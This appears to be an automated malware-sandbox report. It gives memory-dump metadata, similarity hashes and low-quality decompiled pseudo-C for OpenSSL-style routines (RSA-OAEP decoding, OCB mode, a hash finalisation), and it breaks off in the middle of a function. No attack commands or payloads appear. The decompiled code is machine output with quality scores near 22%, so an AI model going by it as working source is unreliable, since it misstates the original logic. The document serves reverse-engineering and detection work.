                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8936
                                                              0x00000000
                                                              0x00ba8918
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba889f
                                                              0x00ba8860
                                                              0x00ba8860
                                                              0x00ba8860
                                                              0x00ba8864
                                                              0x00ba8872
                                                              0x00ba887c
                                                              0x00ba8881
                                                              0x00ba8884
                                                              0x00ba8886
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba888c
                                                              0x00ba8891
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8891
                                                              0x00000000
                                                              0x00ba8860
                                                              0x00ba8835
                                                              0x00ba8847
                                                              0x00ba884c
                                                              0x00ba884f
                                                              0x00ba8851
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba8851
                                                              0x00ba8796
                                                              0x00ba8796
                                                              0x00ba8798
                                                              0x00ba87cc
                                                              0x00ba87cc
                                                              0x00ba87ce
                                                              0x00000000
                                                              0x00ba87d0
                                                              0x00ba87d0
                                                              0x00ba87df
                                                              0x00ba87e4
                                                              0x00ba87e7
                                                              0x00ba87e9
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba87f3
                                                              0x00ba87f4
                                                              0x00ba87f8
                                                              0x00ba87fa
                                                              0x00000000
                                                              0x00ba87fc
                                                              0x00000000
                                                              0x00ba87fc
                                                              0x00000000
                                                              0x00ba87fa
                                                              0x00000000
                                                              0x00ba87d0
                                                              0x00ba879a
                                                              0x00ba879a
                                                              0x00ba87ac
                                                              0x00ba87b1
                                                              0x00ba87b4
                                                              0x00ba87b6
                                                              0x00000000
                                                              0x00ba87bc
                                                              0x00ba87bc
                                                              0x00ba87bc
                                                              0x00ba87bc
                                                              0x00ba87c0
                                                              0x00ba87c4
                                                              0x00000000
                                                              0x00ba87c4
                                                              0x00ba87b6
                                                              0x00ba8798
                                                              0x00ba8790
                                                              0x00ba878c
                                                              0x00ba86aa
                                                              0x00ba84c8
                                                              0x00ba84c8
                                                              0x00ba84ca
                                                              0x00ba84ca
                                                              0x00ba84cc
                                                              0x00ba84ce
                                                              0x00ba84d0
                                                              0x00ba84d0
                                                              0x00ba84d1
                                                              0x00ba84d5
                                                              0x00ba84e4
                                                              0x00ba84e4
                                                              0x00ba84c6
                                                              0x00ba84bb
                                                              0x00ba84b0
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $0$gfff
                                                              • API String ID: 0-3930087101
                                                              • Opcode ID: 5c51db951ea2f876e7235b853388be60cb02c27a0c49ba69c33b5e39e40fc11d
                                                              • Instruction ID: a5267448ba1436465acb373c5aa85e758cc452bb07628537df264bfe44a97297
                                                              • Opcode Fuzzy Hash: 5c51db951ea2f876e7235b853388be60cb02c27a0c49ba69c33b5e39e40fc11d
                                                              • Instruction Fuzzy Hash: 9812D2B2E0C3029BDB159E28C94036BB7E4EB96754F2409ADE8C5A3751FF31DD048B82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB9070, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 24%
                                                              			E00BB9070(void* __ebp, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, char _a44, char _a108, signed int _a172, signed int _a180, intOrPtr _a184, intOrPtr _a188, intOrPtr _a192, signed int _a196, signed int _a200, signed int _a204, signed int _a208, signed int _a212) {
				signed int _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t90;
				signed int _t91;
				void* _t98;
				void* _t100;
				void* _t103;
				signed int _t104;
				signed int _t118;
				signed int* _t125;
				signed int _t128;
				signed int _t145;
				signed int _t148;
				void* _t150;
				signed int _t159;
				signed int _t161;
				intOrPtr _t165;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				signed int _t176;
				signed int _t177;
				void* _t179;

				E00C6BB10(0xb0);
				_t79 =  *0xcc5970; // 0x851ab4dd
				_a172 = _t79 ^ _t176;
				_t151 = _a200;
				_t128 = _a196;
				_t165 = _a192;
				_t161 = _a212;
				_t159 = 0;
				_a36 = _a180;
				_t82 = _a208;
				_a16 = _a188;
				_a32 = _a200;
				_a4 = _t82;
				_a20 = _t161;
				_a12 = 0xffffffff;
				_a8 = 0;
				_v0 = 0;
				_a24 = 0;
				if(_t82 == 0) {
					_t82 = E00BBBEA0();
					_a4 = _t82;
				}
				if(_t161 == _t159) {
					_a20 = _t82;
				}
				_t83 = E00B97480(_t82);
				_t177 = _t176 + 4;
				_a28 = _t83;
				if(_a184 <= _t159 || _t165 <= _t159) {
					_t84 = _t83 | 0xffffffff;
				} else {
					if(_t128 < _t165) {
						L25:
						_push(0xec);
						_push("crypto\\rsa\\rsa_oaep.c");
						_push(0x79);
						goto L26;
					} else {
						_t23 = _t83 + 2; // 0x2
						if(_t128 < _t83 + _t23) {
							goto L25;
						} else {
							_push(0x99);
							_t161 = _t128 - _t83 - 1;
							_push("crypto\\rsa\\rsa_oaep.c");
							_t90 = E00BA33F0(_t161);
							_push(0x9a);
							_push("crypto\\rsa\\rsa_oaep.c");
							_v0 = _t90;
							_t91 = E00BA33F0(_t128);
							_t177 = _t177 + 0x18;
							_t159 = _t91;
							_a24 = _t159;
							if(_v0 == 0 || _t159 == 0) {
								_push(0x9c);
								_push("crypto\\rsa\\rsa_oaep.c");
								_push(0x41);
								L26:
								_push(0x99);
								_push(4);
								E00B98310(_t159);
								_t179 = _t177 + 0x14;
							} else {
								E00C6BB40(_t159, _t159, 0, _t128);
								E00C6B7A0(_t128 - _t165 + _t159, _t159, _t161, _t128 - _t165 + _t159, _a16, _t165);
								_t94 =  *_t159 & 0x000000ff;
								_t128 = _a28;
								_t30 = _t94 - 1; // -1
								_push(_a20);
								_t168 = _t30 >> 0x0000001f &  !( *_t159 & 0x000000ff) >> 0x0000001f;
								_t31 = _t159 + 1; // 0x1
								_push(_t161);
								_t159 = _t128 + _t159 + 1;
								_push(_t159);
								_t151 =  &_a44;
								_push(_t128);
								_push( &_a44);
								_t169 =  ~_t168;
								_a16 = _t31;
								_a40 = _t159;
								_t98 = E00BB8D10(_t169);
								_t179 = _t177 + 0x2c;
								if(_t98 == 0) {
									_t159 = 0;
									if(_t128 > 0) {
										_t150 = _a16 -  &_a44;
										do {
											 *(_t179 + _t159 + 0x3c) =  *(_t179 + _t159 + 0x3c) ^  *(_t150 + _t179 + _t159 + 0x3c);
											_t159 = _t159 + 1;
										} while (_t159 < _t128);
									}
									_t151 = _v0;
									_push(_a20);
									_push(_t128);
									_push( &_a44);
									_push(_t161);
									_push(_v0);
									_t100 = E00BB8D10(_t169);
									_t179 = _t179 + 0x14;
									if(_t100 == 0) {
										if(_t161 > 0) {
											_t125 = _v0;
											_t159 = _a40 - _t125;
											_t148 = _t161;
											do {
												 *_t125 =  *_t125 ^  *(_t125 + _t159);
												_t125 =  &(_t125[0]);
												_t148 = _t148 - 1;
											} while (_t148 != 0);
										}
										_t151 = _a204;
										_t103 = E00BBBC10(_t128, _t169, _a32, _a204,  &_a108, 0, _a4, 0);
										_t179 = _t179 + 0x18;
										if(_t103 != 0) {
											_t151 = _v0;
											_t104 = E00BA3A50(_v0,  &_a108, _t128);
											_t159 = _a28;
											_t55 = _t104 - 1; // -1
											_t170 = _t169 &  ~(_t55 >> 0x0000001f &  !_t104 >> 0x0000001f);
											_t177 = _t179 + 0xc;
											_t128 = 0;
											_a4 = _t170;
											while(_t159 < _t161) {
												_t145 =  *(_t159 + _v0) & 0x000000ff;
												_t59 = (_t145 ^ 0x00000001) - 1; // -2
												_t151 =  ~(_t59 >> 0x0000001f &  !(_t145 ^ 0x00000001) >> 0x0000001f);
												_t118 =  !_t128 & _t151;
												_t128 = _t128 | _t151;
												_t61 = _t145 - 1; // -2
												_a8 =  !_t118 & _a8 | _t118 & _t159;
												_t170 = _a4 & ( ~(_t61 >> 0x0000001f &  !_t145 >> 0x0000001f) | _t128);
												_t159 = _t159 + 1;
												_a4 = _t170;
											}
											if((_t170 & _t128) == 0) {
												goto L25;
											} else {
												_t108 = _a8 + 1;
												_t161 = _t161 - _a8 + 1;
												_a12 = _t161;
												if(_a184 >= _t161) {
													_t151 = _a36;
													E00C6B7A0(_t128, _t159, _t161, _a36, _t108 + _v0, _t161);
													_t179 = _t177 + 0xc;
												} else {
													E00B98310(_t159, 4, 0x99, 0x6d, "crypto\\rsa\\rsa_oaep.c", 0xdf);
													_t177 = _t177 + 0x14;
													_a12 = 0xffffffff;
													goto L25;
												}
											}
										}
									}
								}
							}
						}
					}
					_push(0xee);
					_push("crypto\\rsa\\rsa_oaep.c");
					E00BA3490(_v0);
					_push(0xef);
					_push("crypto\\rsa\\rsa_oaep.c");
					E00BA3490(_a24);
					_t84 = _a12;
					_t177 = _t179 + 0x18;
				}
				return E00C69C26(_t84, _t128, _a172 ^ _t177, _t151, _t159, _t161);
			}































                                                              0x00bb9075
                                                              0x00bb907a
                                                              0x00bb9081
                                                              0x00bb9096
                                                              0x00bb909e
                                                              0x00bb90a6
                                                              0x00bb90ae
                                                              0x00bb90b6
                                                              0x00bb90b8
                                                              0x00bb90bc
                                                              0x00bb90c3
                                                              0x00bb90c7
                                                              0x00bb90cb
                                                              0x00bb90cf
                                                              0x00bb90d3
                                                              0x00bb90db
                                                              0x00bb90df
                                                              0x00bb90e3
                                                              0x00bb90e9
                                                              0x00bb90eb
                                                              0x00bb90f0
                                                              0x00bb90f0
                                                              0x00bb90f6
                                                              0x00bb90f8
                                                              0x00bb90f8
                                                              0x00bb90fd
                                                              0x00bb9102
                                                              0x00bb910c
                                                              0x00bb9110
                                                              0x00bb9390
                                                              0x00bb911e
                                                              0x00bb9120
                                                              0x00bb931f
                                                              0x00bb931f
                                                              0x00bb9324
                                                              0x00bb9329
                                                              0x00000000
                                                              0x00bb9126
                                                              0x00bb9126
                                                              0x00bb912c
                                                              0x00000000
                                                              0x00bb9132
                                                              0x00bb9136
                                                              0x00bb913b
                                                              0x00bb913c
                                                              0x00bb9142
                                                              0x00bb9147
                                                              0x00bb914c
                                                              0x00bb9152
                                                              0x00bb9156
                                                              0x00bb915b
                                                              0x00bb9163
                                                              0x00bb9165
                                                              0x00bb9169
                                                              0x00bb9382
                                                              0x00bb9387
                                                              0x00bb938c
                                                              0x00bb932b
                                                              0x00bb932b
                                                              0x00bb9330
                                                              0x00bb9332
                                                              0x00bb9337
                                                              0x00bb9177
                                                              0x00bb917b
                                                              0x00bb918b
                                                              0x00bb9190
                                                              0x00bb9197
                                                              0x00bb919b
                                                              0x00bb91a3
                                                              0x00bb91a7
                                                              0x00bb91a9
                                                              0x00bb91ac
                                                              0x00bb91ad
                                                              0x00bb91b1
                                                              0x00bb91b2
                                                              0x00bb91b6
                                                              0x00bb91b7
                                                              0x00bb91b8
                                                              0x00bb91ba
                                                              0x00bb91be
                                                              0x00bb91c2
                                                              0x00bb91c7
                                                              0x00bb91cc
                                                              0x00bb91d2
                                                              0x00bb91d6
                                                              0x00bb91e0
                                                              0x00bb91e2
                                                              0x00bb91e9
                                                              0x00bb91eb
                                                              0x00bb91ec
                                                              0x00bb91e2
                                                              0x00bb91f4
                                                              0x00bb91f8
                                                              0x00bb91f9
                                                              0x00bb91fe
                                                              0x00bb91ff
                                                              0x00bb9200
                                                              0x00bb9201
                                                              0x00bb9206
                                                              0x00bb920b
                                                              0x00bb9213
                                                              0x00bb9215
                                                              0x00bb921d
                                                              0x00bb921f
                                                              0x00bb9221
                                                              0x00bb9224
                                                              0x00bb9226
                                                              0x00bb9227
                                                              0x00bb9227
                                                              0x00bb9221
                                                              0x00bb9230
                                                              0x00bb924a
                                                              0x00bb924f
                                                              0x00bb9254
                                                              0x00bb925a
                                                              0x00bb9268
                                                              0x00bb926d
                                                              0x00bb9271
                                                              0x00bb9280
                                                              0x00bb9282
                                                              0x00bb9285
                                                              0x00bb9289
                                                              0x00bb928d
                                                              0x00bb9294
                                                              0x00bb929d
                                                              0x00bb92ae
                                                              0x00bb92b0
                                                              0x00bb92bc
                                                              0x00bb92c0
                                                              0x00bb92cf
                                                              0x00bb92d9
                                                              0x00bb92db
                                                              0x00bb92de
                                                              0x00bb92de
                                                              0x00bb92e6
                                                              0x00000000
                                                              0x00bb92e8
                                                              0x00bb92ec
                                                              0x00bb92ed
                                                              0x00bb92f6
                                                              0x00bb92fa
                                                              0x00bb936f
                                                              0x00bb9378
                                                              0x00bb937d
                                                              0x00bb92fc
                                                              0x00bb930f
                                                              0x00bb9314
                                                              0x00bb9317
                                                              0x00000000
                                                              0x00bb9317
                                                              0x00bb92fa
                                                              0x00bb92e6
                                                              0x00bb9254
                                                              0x00bb920b
                                                              0x00bb91cc
                                                              0x00bb9169
                                                              0x00bb912c
                                                              0x00bb933e
                                                              0x00bb9343
                                                              0x00bb9349
                                                              0x00bb9352
                                                              0x00bb9357
                                                              0x00bb935d
                                                              0x00bb9362
                                                              0x00bb9366
                                                              0x00bb9366
                                                              0x00bb93ab

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\rsa\rsa_oaep.c
                                                              • API String ID: 2102423945-3183921844
                                                              • Opcode ID: 281310ac8bc1da9a3f021e37fde1c44f3b430590c29f7442861fa8ee86678359
                                                              • Instruction ID: f04d12f7b35b6ae06f92a0c79c36f19bb16125c866a630f8a5dd25294fbfb683
                                                              • Opcode Fuzzy Hash: 281310ac8bc1da9a3f021e37fde1c44f3b430590c29f7442861fa8ee86678359
                                                              • Instruction Fuzzy Hash: E191D2B1648341AFD320DF68CC81FAFB7E5EBC8704F404A6DF695D7281DAB099058B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9D5F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\modes\ocb128.c
                                                              • API String ID: 2102423945-214209448
                                                              • Opcode ID: c0de6bdec50645460f91c76f976876b380d8166fe82c1e45db7c5532388a80a6
                                                              • Instruction ID: 74222cba9376155d9d368179e6e47b811c0a1300235d093375fdf4bce26ce2bb
                                                              • Opcode Fuzzy Hash: c0de6bdec50645460f91c76f976876b380d8166fe82c1e45db7c5532388a80a6
                                                              • Instruction Fuzzy Hash: A2416D3100D7A2ABC711CF29D041B97FBE4AF96704F14888DE0D45B692C2B5FA09CBA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BB40F0, Relevance: 3.1, APIs: 2, Instructions: 124COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 89%
                                                              			E00BB40F0(unsigned int* _a4, unsigned int* _a8) {
				void* __edi;
				unsigned int* _t33;
				unsigned int* _t34;
				unsigned int* _t35;
				unsigned int* _t36;
				unsigned int* _t38;
				unsigned int* _t39;
				unsigned int* _t40;
				unsigned int* _t41;
				unsigned int* _t42;
				unsigned int* _t43;
				unsigned int* _t44;
				unsigned int* _t46;
				unsigned int* _t47;
				unsigned int _t53;
				unsigned int _t61;
				unsigned int _t63;
				unsigned int _t65;
				unsigned int _t67;
				unsigned int* _t88;
				unsigned int* _t89;
				unsigned int* _t90;
				unsigned int* _t91;
				unsigned int* _t92;
				unsigned int* _t93;
				unsigned int* _t94;
				unsigned int* _t96;
				unsigned int* _t97;
				void* _t99;

				_t88 = _a8;
				_t53 = _t88[0x16];
				_t89 =  &(_t88[6]);
				 *((char*)(_t89 + _t53)) = 0x80;
				_t54 = _t53 + 1;
				if(_t53 + 1 > 0x38) {
					E00C6BB40(_t88, _t54 + _t89, 0, 0x40 - _t54);
					_push(1);
					_push(_t89);
					_push(_t88);
					_t54 = 0;
					E00BCA800();
					_t99 = _t99 + 0x18;
				}
				E00C6BB40(_t88, _t54 + _t89, 0, 0x38 - _t54);
				_t89[0xe] = _t88[4] & 0x000000ff;
				_t90 =  &(_t89[0xe]);
				_t90[0] = _t88[4] & 0x000000ff;
				_t91 =  &(_t90[0]);
				_t91[0] = _t88[4] & 0x000000ff;
				_t92 =  &(_t91[0]);
				_t92[0] = _t88[4] & 0x000000ff;
				_t93 =  &(_t92[0]);
				_t93[0] = _t88[5] & 0x000000ff;
				_t94 =  &(_t93[0]);
				_t94[0] = _t88[5] & 0x000000ff;
				_t96 =  &(_t94[0]);
				 *_t96 = _t88[5] & 0x000000ff;
				_t97 =  &(_t96[0]);
				 *_t97 = _t88[5] & 0x000000ff;
				_push(1);
				_push(_t97 - 0x3f);
				_push(_t88);
				E00BCA800();
				_t88[0x16] = 0;
				E00BA39E0(_t97 - 0x3f, 0x40);
				_t61 =  *_t88;
				_t33 = _a4;
				 *_t33 = _t61;
				_t34 =  &(_t33[0]);
				 *_t34 = _t61 >> 8;
				_t35 =  &(_t34[0]);
				 *_t35 = _t61 >> 0x10;
				_t36 =  &(_t35[0]);
				 *_t36 = _t61 >> 0x18;
				_t63 = _t88[1];
				_t36[0] = _t63;
				_t38 =  &(_t36[0]);
				 *_t38 = _t63 >> 8;
				_t39 =  &(_t38[0]);
				 *_t39 = _t63 >> 0x10;
				_t40 =  &(_t39[0]);
				 *_t40 = _t63 >> 0x18;
				_t65 = _t88[2];
				_t41 =  &(_t40[0]);
				 *_t41 = _t65;
				_t42 =  &(_t41[0]);
				 *_t42 = _t65 >> 8;
				_t43 =  &(_t42[0]);
				 *_t43 = _t65 >> 0x10;
				_t44 =  &(_t43[0]);
				 *_t44 = _t65 >> 0x18;
				_t67 = _t88[3];
				_t44[0] = _t67;
				_t46 =  &(_t44[0]);
				 *_t46 = _t67 >> 8;
				_t47 =  &(_t46[0]);
				 *_t47 = _t67 >> 0x10;
				_t47[0] = _t67 >> 0x18;
				return 1;
			}
































                                                              0x00bb40f3
                                                              0x00bb40f7
                                                              0x00bb40fa
                                                              0x00bb40fd
                                                              0x00bb4101
                                                              0x00bb4105
                                                              0x00bb4114
                                                              0x00bb4119
                                                              0x00bb411b
                                                              0x00bb411c
                                                              0x00bb411d
                                                              0x00bb411f
                                                              0x00bb4124
                                                              0x00bb4124
                                                              0x00bb4134
                                                              0x00bb413d
                                                              0x00bb4144
                                                              0x00bb4147
                                                              0x00bb414e
                                                              0x00bb414f
                                                              0x00bb4156
                                                              0x00bb4157
                                                              0x00bb415e
                                                              0x00bb415f
                                                              0x00bb4166
                                                              0x00bb4167
                                                              0x00bb416f
                                                              0x00bb4170
                                                              0x00bb4176
                                                              0x00bb4177
                                                              0x00bb4179
                                                              0x00bb417e
                                                              0x00bb417f
                                                              0x00bb4180
                                                              0x00bb4188
                                                              0x00bb418f
                                                              0x00bb4194
                                                              0x00bb4196
                                                              0x00bb419a
                                                              0x00bb419c
                                                              0x00bb41a2
                                                              0x00bb41a4
                                                              0x00bb41aa
                                                              0x00bb41ac
                                                              0x00bb41b0
                                                              0x00bb41b2
                                                              0x00bb41b5
                                                              0x00bb41b9
                                                              0x00bb41bf
                                                              0x00bb41c1
                                                              0x00bb41c7
                                                              0x00bb41c9
                                                              0x00bb41cd
                                                              0x00bb41cf
                                                              0x00bb41d2
                                                              0x00bb41d3
                                                              0x00bb41d5
                                                              0x00bb41db
                                                              0x00bb41df
                                                              0x00bb41e6
                                                              0x00bb41e8
                                                              0x00bb41ec
                                                              0x00bb41ee
                                                              0x00bb41f1
                                                              0x00bb41f7
                                                              0x00bb41fb
                                                              0x00bb41ff
                                                              0x00bb4204
                                                              0x00bb420a
                                                              0x00bb4213

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 9a87ab689afa0e2c381a49084cd72cac18ca1241c17c9dcc8a57c48f59368db1
                                                              • Instruction ID: 8dbbf00a59f4c1a4ef150deb04a48d4cb9dec50b6c73fb178fa4073298ef9438
                                                              • Opcode Fuzzy Hash: 9a87ab689afa0e2c381a49084cd72cac18ca1241c17c9dcc8a57c48f59368db1
                                                              • Instruction Fuzzy Hash: 2C41F65010D7D25FD31A8A3E0CC0A66BF96DFB7100B0886DDE8D69BB87C564A896C7F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9CB30, Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 7d853e3eb07e464758e4851624055ef26b56abfb4c18282043259d47c4ec4342
                                                              • Instruction ID: a85e392672660d4143dd17d31b3124b0df7c69ea0ab3112e29ea4aa162974ad0
                                                              • Opcode Fuzzy Hash: 7d853e3eb07e464758e4851624055ef26b56abfb4c18282043259d47c4ec4342
                                                              • Instruction Fuzzy Hash: 53819C715087419FD728CF29C491A6BBBE4FFC8314F448A6EE4DA87651D730EA48CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9CFE0, Relevance: 1.7, APIs: 1, Instructions: 188COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 22%
                                                              			E00B9CFE0(void* __ebp, signed char _a3, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int* _a48, signed char _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				signed char _t80;
				signed int _t82;
				intOrPtr _t83;
				void* _t92;
				signed int* _t93;
				signed int* _t98;
				signed int _t110;
				signed int _t111;
				void* _t123;
				signed int _t130;
				signed int _t131;
				intOrPtr _t133;
				signed int _t140;
				unsigned int _t143;
				signed int _t146;
				signed int* _t148;
				void* _t149;
				signed int _t151;
				intOrPtr* _t153;
				void* _t155;
				signed int _t157;

				_t149 = __ebp;
				E00C6BB10(0x2c);
				_t77 =  *0xcc5970; // 0x851ab4dd
				_a40 = _t77 ^ _t157;
				_t107 = _a52;
				_t148 = _a48;
				_t131 = _t148[0xb];
				_a12 = _a56;
				_t80 =  *_t148;
				_a20 = _a64;
				_t110 = _t148[0xa];
				_a3 = _t80;
				_a16 = _t110;
				_a4 = _t131;
				if((_t80 & 0x00000040) == 0) {
					 *_t110(_t148,  &(_t148[4]), _t131);
					_t80 = _a3;
					_t157 = _t157 + 0xc;
					_t148[8] = _t148[8] + 1;
					asm("adc dword [esi+0x24], 0x0");
				}
				_t82 = _t80 & 7;
				_t133 = 0xf - _t82;
				 *_t148 = _t82;
				_t83 = 0xf;
				_t111 = 0;
				_a8 = 0xf;
				if(0xf < 0xf) {
					do {
						_t130 = _t111 |  *(_t148 + _t83) & 0x000000ff;
						 *(_t148 + _t83) = 0;
						_t83 = _t83 + 1;
						_t111 = _t130 << 8;
					} while (_t83 < 0xf);
				}
				_t84 = _t148[3] & 0x000000ff;
				_t146 = _a60;
				_t148[3] = 1;
				if((_t111 | _t148[3] & 0x000000ff) == _t146) {
					_t148[8] = _t148[8] + ((_t146 + 0x0000000f | 0x00000008) >> 3);
					asm("adc dword [esi+0x24], 0x0");
					__eflags = _t148[9] - 0x20000000;
					if(__eflags < 0) {
						L11:
						_push(_t149);
						_t151 = _t146 >> 4;
						__eflags = _t151;
						if(_t151 == 0) {
							L14:
							__eflags = _t146;
							if(_t146 != 0) {
								_t92 = 0;
								__eflags = _t146;
								if(_t146 > 0) {
									do {
										 *(_t148 + _t92 + 0x10) =  *(_t148 + _t92 + 0x10) ^  *(_t107 + _t92);
										_t92 = _t92 + 1;
										__eflags = _t92 - _t146;
									} while (_t92 < _t146);
								}
								_t153 = _a16;
								_t93 =  &(_t148[4]);
								 *_t153(_t93, _t93, _a4);
								 *_t153(_t148,  &_a24, _a4);
								_t157 = _t157 + 0x18;
								_t123 = 0;
								__eflags = _t146;
								if(_t146 > 0) {
									_t155 = _t107 -  &_a24;
									_t140 = _a12 -  &_a24;
									__eflags = _t140;
									do {
										_t98 = _t157 + _t123 + 0x28;
										_t107 =  *(_t98 + _t155) ^  *_t98;
										_t123 = _t123 + 1;
